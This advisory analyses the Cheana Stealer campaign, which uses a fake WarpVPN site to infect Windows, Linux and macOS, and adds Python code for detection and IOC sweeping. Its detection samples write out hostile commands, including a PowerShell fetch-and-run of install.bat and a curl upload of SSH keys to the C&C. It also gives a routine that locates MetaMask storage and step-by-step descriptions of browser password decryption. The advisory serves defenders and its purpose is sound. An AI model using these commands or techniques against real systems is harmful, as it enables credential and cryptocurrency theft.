1.0 Introduction
Cybersecurity researchers recently identified a phishing campaign distributing the “Cheana Stealer” malware through a fake VPN website. The campaign is notable for targeting Windows, Linux and macOS users alike: the threat actor built a separate stealer for each operating system and delivers them from a deceptive site that mimics the legitimate Cloudflare WARP (“WarpVPN”) service.

Figure 1: Phishing site
2.0 Impact
The victim is instructed to download and run what appears to be a VPN installer. The stealer it launches collects sensitive data from the victim’s machine, packages it into ZIP archives and uploads it to the attacker’s server, and then installs the genuine VPN client so that the victim has no obvious reason to suspect anything.
3.0 Affected Systems
- Windows
- Linux
- macOS
4.0 Targets
- Cryptocurrency related browser extensions
- Standalone crypto wallets
- Stored browser passwords
- Browser login data
- Cookies
- SSH keys
- macOS passwords
- Keychain
5.0 Technical Details
5.1 Spreading Mechanism
A Telegram channel connected to this campaign has been identified, with the phishing website mentioned in the channel's bio. This channel, which has over 54,000 subscribers, is instrumental in spreading malicious content.

Figure 2: Telegram Channel
This Telegram channel has been active since at least 2018 and has experienced various profile updates over time, as depicted in the figure below. Significantly, the phishing site was incorporated into its bio in 2021.

Figure 3: Telegram Profile Changes
5.2 Execution Across Different Platforms
5.2.1 Windows
The Windows installation instructions are PowerShell commands. ‘Invoke-WebRequest’ first fetches “install.bat” from “hxxps://warpvpn[.]net”; ‘Start-Process’ then launches a new ‘cmd.exe’ instance with ‘install.bat’ as its argument, so the batch file runs in a separate process. Because ‘Invoke-WebRequest’ and ‘Start-Process’ are PowerShell cmdlets, these commands only work in PowerShell, not in the classic Command Prompt.

Figure 4: Installation instructions for Windows
The “install.bat” script performs the following steps:
- Check silently whether Python is installed with “python --version >nul 2>&1”. If it is not, download and extract “python-3.11.3-embed-amd64.zip” from python.org.
- Check whether “pip” is installed. If it is not, download and run the ‘get-pip.py’ script from “hxxps://bootstrap.pypa[.]io/get-pip.py”.
- Check whether “virtualenv” is installed; if it is missing, install it with pip.
- Create a virtual environment and activate it with “call venv\Scripts\activate”.
- Download and install the “hclockify-win” package from “hxxps://ganache[.]live/media/attachments/hclockify-win.zip”, which masquerades as the legitimate Python “clockify” module.
- Install the package’s dependencies with “pip”.
- Run “main.py” from the “hclockify-win” package; this is the stealer itself.
- Jump with a “goto” to a lure routine that installs the legitimate Cloudflare WARP client, so the victim ends up with a working VPN and no visible sign of compromise.

Figure 5: Content of Install.bat
5.2.1.1 Targeting Browser Extensions
The Python package “hclockify-win” contains a module called “ganache.helperwd” that inspects various Chromium-based browsers, such as Chrome, Brave, Opera, and Microsoft Edge, for cryptocurrency wallet extensions like Trust Wallet, TronLink, Coinbase, Crypto.com, Nami, and Solana. When these extensions are found, the module compresses their directories into a zip file and transmits the data to the threat actor’s command and control (C&C) server via a POST request.

Figure 6: Targets Browser Extension
By targeting these extensions, the threat actors aim to steal cryptocurrency wallet data, including private keys, recovery phrases, and transaction details. This could potentially give them unauthorized access to the victim’s digital assets, which can then be further exploited or sold on cybercrime forums.
After checking the Chromium-based browsers, the module scans all Firefox profiles. In each profile it reads prefs.js, where the ‘extensions.webextensions.uuids’ preference maps every installed extension ID to the random UUID Firefox assigned to that extension in that profile; the module searches for ‘webextension@metamask.io’ to obtain MetaMask’s UUID. With that UUID it locates MetaMask’s storage directory, which in the analysed sample was “b0kwoimz.default-release\storage\default\moz-extension+++7f784e52-eabb-4316-8e36-850ac47f0760^userContextId=4294967295”.
The script then compresses this directory into a zip file and sends it to the threat actors’ server with another POST request.

Figure 7: Targets Firefox’s MetaMask extension
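To make the prefs.js lookup concrete, the following Python script is an added example written for this page; it is not code from the advisory, from Cyble or from the stealer. It parses the ‘extensions.webextensions.uuids’ preference out of a constructed prefs.js excerpt, resolves the per-profile UUID for ‘webextension@metamask.io’, and builds the “storage/default/moz-extension+++<uuid>^userContextId=4294967295” directory path the module is described as collecting. The profile name and the MetaMask UUID are reused from Figure 7; the second extension entry in the sample is made up. Against a real profile, audit_profile() only reports whether the directory exists, which is what an inventory or DFIR check needs.

```python
import json
import re
from pathlib import Path

# Extension ID the advisory says the module searches for in prefs.js.
METAMASK_ID = "webextension@metamask.io"

# Firefox keeps a JSON map {extension_id: uuid} inside this preference; the
# map is written as an escaped JS string literal on a single user_pref line.
UUID_PREF_RE = re.compile(
    r'user_pref\("extensions\.webextensions\.uuids",\s*"((?:[^"\\]|\\.)*)"\);'
)

# Constructed prefs.js excerpt (not taken from a real profile). The MetaMask
# UUID is the one in the advisory's Figure 7 path; the second entry is invented.
SAMPLE_PREFS_JS = r'''
user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1724800000);
user_pref("extensions.webextensions.uuids", "{\"webextension@metamask.io\":\"7f784e52-eabb-4316-8e36-850ac47f0760\",\"formautofill@mozilla.org\":\"0a1b2c3d-1111-2222-3333-444455556666\"}");
user_pref("signon.rememberSignons", true);
'''


def extension_uuids(prefs_js: str) -> dict:
    """Parse prefs.js text and return {extension_id: uuid}."""
    m = UUID_PREF_RE.search(prefs_js)
    if not m:
        return {}
    # First json.loads undoes the JS string escaping, the second parses the map.
    inner = json.loads('"' + m.group(1) + '"')
    return json.loads(inner)


def extension_storage_dir(profile_dir, uuid, user_context_id=4294967295) -> Path:
    """Directory holding the extension's IndexedDB / localStorage data."""
    return (Path(profile_dir) / "storage" / "default"
            / f"moz-extension+++{uuid}^userContextId={user_context_id}")


def wallet_storage_dirs(prefs_js: str, profile_dir, targets=(METAMASK_ID,)) -> dict:
    """Map each targeted extension ID to the storage dir the stealer would zip."""
    uuids = extension_uuids(prefs_js)
    return {ext: extension_storage_dir(profile_dir, uuids[ext])
            for ext in targets if ext in uuids}


def audit_profile(profile_dir, targets=(METAMASK_ID,)) -> dict:
    """Read a real profile's prefs.js and report which target dirs exist on disk."""
    prefs = Path(profile_dir) / "prefs.js"
    if not prefs.is_file():
        return {}
    text = prefs.read_text(encoding="utf-8", errors="replace")
    return {ext: d.is_dir() for ext, d in wallet_storage_dirs(text, profile_dir, targets).items()}


if __name__ == "__main__":
    for ext, d in wallet_storage_dirs(SAMPLE_PREFS_JS, "b0kwoimz.default-release").items():
        print(ext, "->", d)
```

The same preference resolves the UUID of any other extension, so the target tuple can be extended to the wallet IDs an organisation cares about without changing the parsing.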
5.2.1.2 Targeting Crypto Wallets
The malicious Python module scans the system for installed cryptocurrency wallets, detecting the installation directories for popular crypto wallets like Bitcoin, Monero, and Dashcore. Once these directories are identified, the module compresses the wallet contents into a zip file and then uploads it to the threat actors' command and control (C&C) server via a POST request.

Figure 8: Targets Crypto Wallets
5.2.1.3 Targeting Browser Passwords
The module targets the saved passwords that Chromium-based browsers keep in the SQLite database “Login Data”. It first enumerates the profile folders under “<Browser>\User Data\”, then reads the “Local State” file, whose os_crypt section holds the browser’s AES key protected with Windows DPAPI. The script calls CryptUnprotectData() to recover that key and then uses it (AES-GCM) to decrypt the password_value column of each row in “Login Data”; the database itself is plain SQLite, only the password values are encrypted. The result is every saved URL, username and password in clear text, ready for exfiltration. Because DPAPI decrypts for any process running as the logged-in user, no elevation is needed.

Figure 9: Targets Browsers Passwords
For non-Chromium browsers such as Firefox, the TA uses a module named “ganache.fflg” that works on Windows, Linux and macOS; here the Windows path is described. The module iterates through all Firefox profiles and collects key files such as “prefs.js”, “logins.json” and, as a fallback for older versions, “signons.sqlite”. It then loads Mozilla’s Network Security Services library (nss3.dll), initialised on the profile directory so that the profile’s key database is available, and uses it to decrypt the stored logins to plain text; a primary (master) password set in Firefox would block this step. The decrypted credentials are then exfiltrated from the victim’s machine to the TA’s command and control (C&C) server.

Figure 10: Targeting Firefox Browser

Figure 11: nss utility for credential decryption
5.3 Linux/Ubuntu
For Linux, the TA crafted a curl command to download the “install-linux.sh” script from ‘hxxps://warpvpn.net’.

Figure 12: Installation Instruction for Linux
The “install-linux.sh” script first tries to read a unique victim ID from the “warpvpn” configuration file at “$HOME/.config/warpvpn”. If the file does not exist, the script sends a POST request to the server containing the victim’s username, operating system and the phishing source, and receives a new ID in return. This ID is then included in every subsequent POST request that carries stolen data, so the attacker can tie all uploads to one victim.

Figure 13: Unique ID
The “install-linux.sh” script has two main parts: a stealer that collects sensitive browser data and cryptocurrency wallet files, and a function that mimics the genuine Cloudflare WARP installer.
The Linux stealer replicates the Python-based techniques seen on Windows, targeting browser extensions and cryptocurrency wallets such as Bitcoin and Monero, but adds some Linux-specific steps. The bash script copies the browser’s Login Data and Cookies files from the victim’s system and transmits them to the command and control (C&C) server, and it also searches for and uploads the private keys in the user’s .ssh directory, as illustrated in the figure below. Stolen SSH keys give the attacker a direct route to any other systems the victim can reach with them, which is what makes this step so valuable for follow-on access.

Figure 14: Content of install-linux.sh
5.4 MacOS
For macOS, the TA provides a similar curl command that downloads “install.sh” and then runs it with the default shell, ‘sh’.

Figure 15: Install Instruction for MacOS
5.4.1 Targeting MacOS Password
The script tricks the user into entering their credentials by imitating the system prompt that normally appears when a new application is installed. After the user types a password, the script validates it with ‘dscl . -authonly’ against the local directory service. Only when validation succeeds are the credentials, together with the contents of the “/Library/Keychains” folder, sent to the attacker’s command and control (C&C) server with a ‘curl’ POST request; on failure the script simply prompts again and loops until a valid password is entered. Validating first matters to the attacker because the login keychain is encrypted with the user’s login password, so a verified password is what makes the stolen keychain usable.

Figure 16: MacOS password exfiltration
On macOS the threat actor collects much the same data as on Linux, but with a wider set of targets. Beyond well-known cryptocurrency wallets such as Bitcoin and Monero, the script also looks for Electrum, Exodus, DashCore and Guarda, and it searches for and exfiltrates saved SSH keys from the user’s .ssh directory.

Figure 17: install.sh (Crypto wallet exfiltration)
5.5 Fake Message and WarpVPN Installation
During the theft operation, the threat actor uses a deceptive tactic by showing a fake “in-progress” message. After successfully exfiltrating the data, the script then downloads and installs the legitimate Cloudflare Warp application on the victim’s machine.

Figure 18: Fake Message and Legitimate VPN Installation
5.6 Exfiltration over HTTPS
Before exfiltration, the stolen files are packed into ZIP archives, one per data type, each with a unique name. The archives are uploaded to the attacker’s command and control (C&C) server with a POST request to “hxxps://ganache[.]live/api/v1/attachment”. Because this is ordinary HTTPS on port 443, the transfer blends in with legitimate web traffic and is hard to spot without TLS inspection or domain-based blocking.

Figure 19: Exfiltration over HTTPS
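As an added example of how the chains described in sections 5.2 to 5.6 can be detected from process-creation telemetry (editor-written code, not the stealer’s and not Cyble’s), the script below classifies each command line into a stage: the PowerShell download from warpvpn.net, cmd.exe running install.bat, pip installing hclockify-win, python running main.py, curl fetching install-linux.sh or install.sh, a shell executing it, ‘dscl . -authonly’, and the curl POST to ganache.live/api/v1/attachment. It raises an alert only when a host shows a high-confidence stage plus at least one other stage, or the exfiltration stage on its own, which keeps an ordinary “sh install.sh” from firing. The sample events are constructed; the ‘iwr’ alias and the exact pip command line are assumptions rather than observed behaviour.

```python
import re
from collections import defaultdict

# Stage signatures for the delivery and theft chain described in the advisory
# (case-insensitive regexes over the full command line). The "iwr" alias for
# Invoke-WebRequest is an assumption, not something the page reports.
STAGES = [
    ("win_download", r"(invoke-webrequest|\biwr\b).*warpvpn\.net"),
    ("win_stage",    r"\bcmd(\.exe)?\b.*install\.bat"),
    ("win_payload",  r"\bpip(\d|\.exe)?\b.*hclockify-win"),
    ("win_stealer",  r"\bpython(\d|\.exe)?\b.*hclockify-win.*main\.py"),
    ("nix_download", r"\bcurl\b.*warpvpn\.net/.*install(-linux)?\.sh"),
    ("nix_stage",    r"^(\S*/)?(ba)?sh\s+\S*install(-linux)?\.sh\b"),
    ("mac_authonly", r"\bdscl\b\s+\.\s+-authonly\b"),
    ("exfil",        r"\bcurl\b.*ganache\.live/api/v1/attachment"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in STAGES]

# Stages specific enough that one of them plus any other stage on the same
# host warrants an alert; an exfil hit alerts on its own.
HIGH = {"win_download", "win_payload", "win_stealer", "nix_download", "mac_authonly", "exfil"}

# Constructed process-creation events (Sysmon EID 1 / auditd / ESF style),
# not real telemetry. Fields: host, pid, ppid, image, cmdline.
EVENTS = [
    {"host": "WS01", "pid": 4120, "ppid": 3001, "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"Invoke-WebRequest https://warpvpn.net/install.bat -OutFile install.bat; Start-Process cmd.exe -ArgumentList '/c install.bat'\""},
    {"host": "WS01", "pid": 4133, "ppid": 4120, "image": "cmd.exe",
     "cmdline": "cmd.exe /c install.bat"},
    {"host": "WS01", "pid": 4150, "ppid": 4133, "image": "pip.exe",
     "cmdline": r"venv\Scripts\pip.exe install -r hclockify-win\requirements.txt"},
    {"host": "WS01", "pid": 4170, "ppid": 4133, "image": "python.exe",
     "cmdline": r"venv\Scripts\python.exe hclockify-win\main.py"},
    {"host": "dev-laptop", "pid": 812, "ppid": 700, "image": "curl",
     "cmdline": "curl -fsSL https://warpvpn.net/install-linux.sh -o install-linux.sh"},
    {"host": "dev-laptop", "pid": 815, "ppid": 700, "image": "bash",
     "cmdline": "bash install-linux.sh"},
    {"host": "dev-laptop", "pid": 820, "ppid": 815, "image": "curl",
     "cmdline": "curl -s -X POST -F file=@ssh_keys.zip https://ganache.live/api/v1/attachment"},
    {"host": "mbp-ana", "pid": 510, "ppid": 480, "image": "sh",
     "cmdline": "sh install.sh"},
    {"host": "mbp-ana", "pid": 512, "ppid": 510, "image": "dscl",
     "cmdline": "dscl . -authonly ana"},
    # Benign: a generic installer script with no link to the campaign.
    {"host": "build-srv", "pid": 99, "ppid": 1, "image": "curl",
     "cmdline": "curl -fsSL https://example.org/install.sh -o install.sh"},
    {"host": "build-srv", "pid": 100, "ppid": 1, "image": "sh",
     "cmdline": "sh install.sh"},
]


def classify(cmdline):
    """Return the first matching stage name, or None."""
    for name, rx in COMPILED:
        if rx.search(cmdline):
            return name
    return None


def lineage(events, pid):
    """Process ancestry for pid as a list of image names, root first."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def detect(events):
    """Correlate stage hits per host and return one alert dict per host that
    shows the exfil stage, or two distinct stages with one of them in HIGH."""
    hits = defaultdict(list)
    for ev in events:
        stage = classify(ev["cmdline"])
        if stage:
            hits[ev["host"]].append((stage, ev))
    alerts = []
    for host, seen in hits.items():
        stages = {s for s, _ in seen}
        if "exfil" in stages or (len(stages) >= 2 and stages & HIGH):
            last = seen[-1][1]
            alerts.append({"host": host,
                           "stages": [s for s, _ in seen],
                           "lineage": lineage(events, last["pid"])})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a["host"], "->", " > ".join(a["lineage"]), a["stages"])
```

The lineage is included because the parent chain (powershell.exe > cmd.exe > python.exe, or sh > dscl) is what an analyst needs to confirm the hit quickly; the stage list alone is enough for the alerting rule.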
The threat actor reviews the exfiltrated data through a web panel built on the Django REST framework, which gives them a structured, searchable view of the stolen files and makes the compromised data easy to exploit.

Figure 20: Attacker’s Login
6.0 Indicators of Compromise (IOCs)
| Indicator | Type |
| --- | --- |
| 70f08497d7a9e6a8e5f2dd3683a20563d20668e1c78df636ff1e36a014c9d493 | SHA-256 |
| acf807def82c4b56752a9fa9b081dbb37ba9cc9f6e1c522568ff502b6b49b6db | SHA-256 |
| 48964c11fcbefd6508164239866c94b55ca2798e9745671c37447ad0a6f3e1c4 | SHA-256 |
| d3ece8616d0dd8244666af574cc2475d947180ed240f49b1a6e61443a896f65d | SHA-256 |
| 3ef838502663c167f5c502585e810ffae3e03152b3f82544b813389c19a33dce | SHA-256 |
| ac4aeab3952f6ca960cbd48c3123f09a68f50818f9bdf35c9d811570893fa102 | SHA-256 |
| 6a68e95ae67aa8c61bd74ecf5f57f98fbdc0bbe0489ae71b7c8732edf49ac3a9 | SHA-256 |
| c044b1a36249f6fe7219e6c48270d9927bf359110ff3583129dcbdff809f2d2d | SHA-256 |
| ba8058b704a55e50c24383a765fd74b38d7dbbf8546c4f179266c265403174b8 | SHA-256 |
| warpvpn[.]net | Phishing domain |
| hxxps://ganache[.]live | C&C / payload host |
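The following Python sweep is an added example for this page (not from the advisory or from Cyble) that turns the IOCs above into a host check: it hashes files under a root directory and compares them with the SHA-256 list, looks for the host artefacts named in section 5 (the “~/.config/warpvpn” victim-ID file and the “hclockify-win” package, whose exact locations are assumptions to adjust for your estate), and provides a domain matcher for DNS or proxy logs that also catches subdomains of the IOC domains. demo_findings() builds a constructed directory tree and injects the hash of a harmless file into the IOC set so that the hash path can be exercised without a real sample.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# SHA-256 hashes and network indicators from section 6.0 of this advisory.
IOC_SHA256 = {
    "70f08497d7a9e6a8e5f2dd3683a20563d20668e1c78df636ff1e36a014c9d493",
    "acf807def82c4b56752a9fa9b081dbb37ba9cc9f6e1c522568ff502b6b49b6db",
    "48964c11fcbefd6508164239866c94b55ca2798e9745671c37447ad0a6f3e1c4",
    "d3ece8616d0dd8244666af574cc2475d947180ed240f49b1a6e61443a896f65d",
    "3ef838502663c167f5c502585e810ffae3e03152b3f82544b813389c19a33dce",
    "ac4aeab3952f6ca960cbd48c3123f09a68f50818f9bdf35c9d811570893fa102",
    "6a68e95ae67aa8c61bd74ecf5f57f98fbdc0bbe0489ae71b7c8732edf49ac3a9",
    "c044b1a36249f6fe7219e6c48270d9927bf359110ff3583129dcbdff809f2d2d",
    "ba8058b704a55e50c24383a765fd74b38d7dbbf8546c4f179266c265403174b8",
}
IOC_DOMAINS = {"warpvpn.net", "ganache.live"}

# Host artefacts named in section 5. Locations are assumptions: the per-victim
# ID file written by install-linux.sh, and the trojanised "hclockify-win"
# package dropped by install.bat.
HOME_ARTEFACTS = [Path(".config") / "warpvpn"]
ARTEFACT_NAMES = {"hclockify-win", "hclockify-win.zip"}


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def domain_matches_ioc(host, iocs=IOC_DOMAINS):
    """True for an IOC domain or any subdomain of it (for DNS/proxy log use)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in iocs)


def sweep(root, home, ioc_hashes=IOC_SHA256, max_size=50 << 20):
    """Return [(kind, path)]: 'artefact' for named paths, 'hash' for files whose
    SHA-256 is in ioc_hashes. Files larger than max_size are skipped."""
    findings = []
    for rel in HOME_ARTEFACTS:
        p = Path(home) / rel
        if p.exists():
            findings.append(("artefact", str(p)))
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if name.lower() in ARTEFACT_NAMES:
                findings.append(("artefact", os.path.join(dirpath, name)))
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                if not os.path.isfile(p) or os.path.getsize(p) > max_size:
                    continue
                digest = sha256_file(p)
            except OSError:
                continue
            if digest in ioc_hashes:
                findings.append(("hash", p))
    return findings


def demo_findings():
    """Build a constructed directory tree, sweep it and return {(kind, basename)}.
    The hash of the harmless 'payload.bin' is injected into the IOC set because
    no real sample ships with this example."""
    root = tempfile.mkdtemp(prefix="cheana-sweep-")
    (Path(root) / ".config").mkdir()
    (Path(root) / ".config" / "warpvpn").write_text("constructed-victim-id")
    (Path(root) / "hclockify-win").mkdir()
    (Path(root) / "payload.bin").write_bytes(b"constructed sample, not malware")
    (Path(root) / "clean.txt").write_text("nothing to see")
    fake_ioc = {hashlib.sha256(b"constructed sample, not malware").hexdigest()}
    return {(k, os.path.basename(p)) for k, p in sweep(root, root, ioc_hashes=fake_ioc)}


if __name__ == "__main__":
    for kind, name in sorted(demo_findings()):
        print(f"{kind:8} {name}")
```

On a real host, call sweep() with the user’s home directory as both arguments (or a mounted image path for offline triage) and the unmodified IOC_SHA256 set; the artefact checks are the cheap part and worth running fleet-wide even where hashing every file is not.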
7.0 MITRE ATT&CK Techniques
| Tactic | Technique | Observed behaviour |
| --- | --- | --- |
| Initial Access (TA0001) | Phishing (T1566) | Victims are lured through a fake VPN website and its installation instructions. |
| Execution (TA0002) | Command and Scripting Interpreter: Windows Command Shell (T1059.003) | cmd.exe runs install.bat |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | Invoke-WebRequest downloads the batch file |
| Execution (TA0002) | Command and Scripting Interpreter: Python (T1059.006) | Python stealer used against Windows users |
| Execution (TA0002) | User Execution (T1204) | The user is instructed to run the commands |
| Credential Access (TA0006) | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | Retrieves passwords from Login Data and Firefox logins.json |
| Credential Access (TA0006) | Credentials from Password Stores: Keychain (T1555.001) | Exfiltrates keychain files from macOS |
| Credential Access (TA0006) | Steal Web Session Cookie (T1539) | Steals browser cookies |
| Collection (TA0009), Credential Access (TA0006) | Input Capture: GUI Input Capture (T1056.002) | Fake password prompt on macOS |
| Credential Access (TA0006) | Unsecured Credentials: Private Keys (T1552.004) | Exfiltrates SSH keys |
| Collection (TA0009) | Archive Collected Data: Archive via Utility (T1560.001) | zip utility compresses data before exfiltration |
| Collection (TA0009) | Archive Collected Data: Archive via Library (T1560.002) | Python zip library compresses data before exfiltration |
| Exfiltration (TA0010) | Exfiltration Over C2 Channel (T1041) | ZIP archives are POSTed to the C&C server over HTTPS |
8.0 Recommendation
CyberSecurity Malaysia encourages users and administrators to review the following cyber security best practices and apply the necessary updates.
Review the Indicators of Compromise (IOCs) and implement the necessary security measures.
- Download Software Only from Reputable Sources: Always verify the legitimacy of any VPN or software prior to downloading.
- Recognize Phishing Attempts: Stay informed about common phishing tactics. Awareness campaigns can help users identify potential scams.
- Advanced Endpoint Protection: Employ advanced security solutions to detect and block malicious scripts. Ensure these tools are updated frequently.
- Monitor Network Traffic: Use security tools to monitor and prevent communication with known malicious C&C servers.
- Enable Multi-Factor Authentication (MFA): Implement MFA to add an additional layer of security, reducing the impact of compromised credentials.
- Incident Response Plan: Develop and regularly update an incident response plan to ensure swift action against potential malware infections
Kindly refer to the following URL: https://cyble.com/blog/new-cheana-stealer-targets-vpn-user/
Generally, we advise users to keep up to date with the latest security announcements from their vendors and to follow best-practice security policies when deciding which updates to apply.
For further enquiries, please contact Cyber999 through the following channels:
E-mail: cyber999[at]cybersecurity.my
Phone: 1-300-88-2999 (monitored during business hours)
Mobile: +60 19 2665850 (24x7 call incident reporting)
Business Hours: Mon - Fri 08:30 -17:30 MYT
Web: https://www.mycert.org.my
9.0 References